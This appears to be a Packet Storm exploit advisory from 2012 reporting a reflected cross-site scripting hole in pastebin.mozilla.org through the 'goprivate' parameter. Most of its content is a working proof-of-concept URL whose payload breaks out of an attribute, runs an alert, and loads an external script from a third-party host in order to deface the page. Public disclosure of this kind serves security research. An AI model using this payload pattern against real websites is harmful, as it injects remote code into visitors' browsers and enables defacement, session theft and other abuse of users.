Pastebin.mozilla.org suffers from a cross site scripting vulnerability.
bc8dbbd84e12fba1958623eb29cf7f1b17742a33fdcd9c7e96c98d30892c41d5+-------------------------------------------------------------------------+
# Exploit Title : Pastebin.mozilla.org - website XSS (Cross Site
Scripting) and deface passive
# Author : Atmon3r (atmoner.com)
# Date : 12/04/2012
# Editor : Jeroen (pastebin.com)
# Xss type : $_GET
+-------------------------------------------------------------------------+
[+] POC:
http://pastebin.mozilla.org/?help=1&goprivate={XSS}&go=Go
[+] DEMO:
http://pastebin.mozilla.org/?help=1&goprivate=/"><script>alert('Xss By
Atm0n3r')</script><script type="text/javascript"
src="http://yourjavascript.com/27544112151/xss.atmon3r.js"></script>&go=Go
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed